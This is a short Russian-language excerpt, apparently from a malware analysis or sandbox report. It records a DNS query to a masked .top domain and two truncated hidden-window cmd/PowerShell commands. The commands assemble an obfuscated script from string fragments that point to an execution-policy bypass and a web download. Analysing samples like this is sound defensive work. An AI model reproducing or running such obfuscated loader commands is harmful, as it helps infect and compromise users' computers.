Техническая информация
- DNS ASK do###sura.top
- '<SYSTEM32>\cmd.exe' /c "powershell $lxekcodr='^Scope P';$exrar='^rocess;';$cbipmi='^bclient';$awdojv='^th';$ujaw='^(''http:';$svypqe='^ess $pa';$mvino='^'');(New';$ipniz='^olicy B';$ihetjy='^f'',$pat';$znyws...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell $lxekcodr='^Scope P';$exrar='^rocess;';$cbipmi='^bclient';$awdojv='^th';$ujaw='^(''http:';$svypqe='^ess $pa';$mvino='^'');(New';$ipniz='^olicy B';$ihetjy='^f'',$pat';$znyws...